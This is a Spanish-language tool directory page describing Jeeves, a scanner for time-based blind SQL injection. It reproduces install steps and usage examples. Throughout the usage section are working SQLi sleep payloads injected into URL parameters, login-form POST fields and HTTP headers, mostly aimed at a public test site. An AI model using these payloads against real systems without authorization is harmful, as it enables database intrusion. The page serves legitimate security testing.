Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Jeeves — Herramienta de detección de inyección SQL ciega basada en tiempo para reconocimiento y bug bounty. Acepta URLs individuales o listas, admite encabezados personalizados, proxy y datos POST para escaneo automatizado de vulnerabilidades. | Kitploit
Herramientas/GitHubGitHub/ferreiraklet/jeeves
Escáneres de VulnerabilidadesSeguridad WebPruebas de Penetración
GitHubferreiraklet/jeeves

Jeeves

Herramienta de detección de inyección SQL ciega basada en tiempo para reconocimiento y bug bounty. Acepta URLs individuales o listas, admite encabezados personalizados, proxy y datos POST para escaneo automatizado de vulnerabilidades.

Ver Repositorio
21550hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

made-with-Go

Jeeves


Uso • Instalación

Jeeves está hecho para buscar Inyecciones SQL Ciegas Basadas en Tiempo durante el reconocimiento.

Contenido:

  • Instalación
  • Uso
    • Agregar Cabeceras
    • Usar Proxy
    • Hacer Petición POST
    • Múltiples formas de uso

- Instalación y Requisitos:

Instalando Jeeves 💀

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

O

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Uso y Explicación:

En tu proceso de reconocimiento, puedes encontrar endpoints que podrían ser vulnerables a inyección SQL. Ej: https://redacted.com/index.php?id=1

URLs individuales

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

En --payload-time debes usar el tiempo mencionado en el payload


Desde una lista

cat targets | jeeves --payload-time 5

Agregar Cabeceras

¡Presta atención a la sintaxis! Debe ser igual =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Usar proxy

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Cabeceras =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Petición POST

Enviando datos mediante petición POST ( formularios de inicio de sesión, etc. )

¡Presta atención a la sintaxis! Debe ser igual! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Otras formas de uso

Puedes usar Jeeves junto con otras herramientas, como gau, gauplus, waybackurls, qsreplace y bhedak, dominando su poder


Parámetros de línea de comandos:

root@kitploit:~
 Usage:
 -t, --payload-time   El tiempo del payload
 -p, --proxy          Enviar tráfico a un proxy
 -c                   Establecer concurrencia, por defecto 25
 -H, --headers        Cabeceras personalizadas
 -d, --data           Enviar petición POST con datos
 -h                   Mostrar este mensaje de ayuda

Usando con una lista de palabras de payloads SQL

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Probando en cabeceras

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

OBS:

  • No sigue redirecciones. Si el código de estado es diferente de 200, devuelve "Need Manual Analisys"
  • Jeeves no hace http probing, no puede hacer peticiones a URLs que no contengan protocolo ( http://, https:// )

¡Este proyecto es solo con fines educativos y de bug bounty! ¡No apoyo ninguna actividad ilegal!.

Si encuentras algún error en el programa, comunícate conmigo de inmediato.

Por favor, revisa también estos =>

Nilo - Comprueba si la URL tiene estado 200

SQLMAP

Blisqy SQLI en cabecera basada en tiempo

Descargar herramienta